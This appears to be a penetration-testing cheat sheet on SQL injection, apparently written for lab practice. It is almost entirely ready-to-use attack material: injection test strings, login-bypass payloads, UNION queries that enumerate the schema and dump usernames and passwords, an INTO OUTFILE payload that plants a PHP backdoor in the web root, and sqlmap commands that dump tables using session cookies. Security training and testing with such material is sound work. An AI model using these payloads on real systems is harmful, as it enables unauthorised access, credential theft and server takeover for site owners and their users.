# SQL injection ## Basic technique Stick `'` in a parameter and see if it throws a database error (and note what kind). Another simple test: ``` ' or '1'='1 ``` Other tests: ``` -' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x ``` ### POST parameters You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a `'` at the end, like `lang=en'`. ## Bypassing authentication If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter: ``` username' or 1=1;# username'- ``` ## Database enumeration The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL. Get version: ``` http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5 ``` You can get the number of columns through trial and error using `order by`. For each query, increase the column number until the database throws an unknown column error: ``` http://[host]/inject.php?id=54 order by 1 http://[host]/inject.php?id=54 order by 2 http://[host]/inject.php?id=54 order by 3 ``` Get the current user: ``` http://[host]/inject.php?id=1 union all select 1,2,3,user(),5 ``` See all tables: ``` http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables ``` Get column names for a specified table: ``` http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users' ``` Get usernames and passwords (0x3a means `:`): ``` http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users ``` You might be able to write to system files depending on permission levels using MySQL's `INTO OUTFILE` function to create a php shell in the web root: ``` http://[host]/inject.php?id=54 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php' ``` I suspect you could inject a full reverse shell in there too... ## SQLmap Assuming you've tested a parameter with `'` and it is injectable, run SQL map against the URL: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dbms=mysql ``` It may not run unless you specify the database type. Get the databases: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dbs --dbms=mysql ``` Get the tables in a database: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --tables -D [database name] ``` Get the columns in a table: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --columns -D [database name] -T [table name] ``` Dump a table: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dump -D [database name] -T [table name] ``` ### Passing tokens If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the `-r` option: ``` sqlmap -r request.txt ``` If you just need to pass a cookie: ``` sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar" ``` ### REST-style URLs If your URLs have no parameters, you can still test them: ``` sqlmap -u "http://[host]/param1*/param2*" ``` ## Further reading * [Gaining a reverse shell from SQL injection](https://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/) * [SQL injection cheat sheet](http://pentestmonkey.net/category/cheat-sheet/sql-injection) * [Dumping a complete database using SQL injection](https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/#gref) * [Hacking node.js and MongoDB](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) * [SQLmap tutorial](https://www.binarytides.com/sqlmap-hacking-tutorial/)